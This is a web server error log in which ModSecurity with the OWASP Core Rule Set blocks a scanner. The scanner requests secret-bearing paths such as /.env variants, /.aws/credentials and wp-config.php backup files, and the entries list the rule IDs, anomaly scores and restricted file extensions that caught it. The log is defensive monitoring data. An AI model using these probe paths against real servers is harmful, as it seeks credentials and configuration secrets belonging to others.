[Wed Feb 19 05:52:57.683869 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.envs"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtwAAAAc"]
[Wed Feb 19 05:52:57.684228 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.envs"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtwAAAAc"]
[Wed Feb 19 05:52:57.684730 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.envs"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtwAAAAc"]
[Wed Feb 19 05:53:28.750494 2025] [:error] [pid 1258388] [client 193.41.206.98:43244] [client 193.41.206.98] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z7VjyAzqEFiMFYV11Byw_gAAAAM"]
[Wed Feb 19 05:53:28.752283 2025] [:error] [pid 1258388] [client 193.41.206.98:43244] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z7VjyAzqEFiMFYV11Byw_gAAAAM"]
[Wed Feb 19 05:53:28.752859 2025] [:error] [pid 1258388] [client 193.41.206.98:43244] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z7VjyAzqEFiMFYV11Byw_gAAAAM"]
[Wed Feb 19 05:53:39.212302 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIQAAAAU"]
[Wed Feb 19 05:53:39.212649 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIQAAAAU"]
[Wed Feb 19 05:53:39.214179 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIQAAAAU"]
[Wed Feb 19 05:53:39.214665 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIQAAAAU"]
[Wed Feb 19 05:53:39.237249 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIgAAAAU"]
[Wed Feb 19 05:53:39.237537 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIgAAAAU"]
[Wed Feb 19 05:53:39.237833 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIgAAAAU"]
[Wed Feb 19 05:53:39.261291 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIwAAAAU"]
[Wed Feb 19 05:53:39.261856 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIwAAAAU"]
[Wed Feb 19 05:53:39.262283 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdIwAAAAU"]
[Wed Feb 19 05:53:39.285609 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdJAAAAAU"]
[Wed Feb 19 05:53:39.285952 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdJAAAAAU"]
[Wed Feb 19 05:53:39.286383 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdJAAAAAU"]
[Wed Feb 19 05:53:39.286833 2025] [:error] [pid 1258425] [client 193.41.206.98:47540] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z7Vj0yMcT3_Z2BZK5CWdJAAAAAU"]
[Wed Feb 19 05:53:49.667030 2025] [authz_core:error] [pid 1259202] [client 193.41.206.98:48154] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/phpinfo.php
[Wed Feb 19 05:54:15.519130 2025] [:error] [pid 1259203] [client 193.41.206.98:33346] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "Z7Vj98O0jkjfdQXx8it7qgAAAAg"]
[Wed Feb 19 05:54:15.519536 2025] [:error] [pid 1259203] [client 193.41.206.98:33346] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "Z7Vj98O0jkjfdQXx8it7qgAAAAg"]
[Wed Feb 19 05:54:15.519995 2025] [:error] [pid 1259203] [client 193.41.206.98:33346] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "Z7Vj98O0jkjfdQXx8it7qgAAAAg"]
[Wed Feb 19 05:54:20.703870 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAAAAAAM"]
[Wed Feb 19 05:54:20.704293 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAAAAAAM"]
[Wed Feb 19 05:54:20.704746 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAAAAAAM"]
[Wed Feb 19 05:54:20.736062 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAQAAAAM"]
[Wed Feb 19 05:54:20.736504 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAQAAAAM"]
[Wed Feb 19 05:54:20.736978 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAQAAAAM"]
[Wed Feb 19 05:54:20.760408 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /:80/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:80/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAgAAAAM"]
[Wed Feb 19 05:54:20.760791 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:80/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAgAAAAM"]
[Wed Feb 19 05:54:20.761223 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:80/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAgAAAAM"]
[Wed Feb 19 05:54:20.784707 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /:443/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:443/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAwAAAAM"]
[Wed Feb 19 05:54:20.785085 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:443/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAwAAAAM"]
[Wed Feb 19 05:54:20.785722 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:443/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxAwAAAAM"]
[Wed Feb 19 05:54:20.810656 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /:432/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:432/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxBAAAAAM"]
[Wed Feb 19 05:54:20.811044 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:432/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxBAAAAAM"]
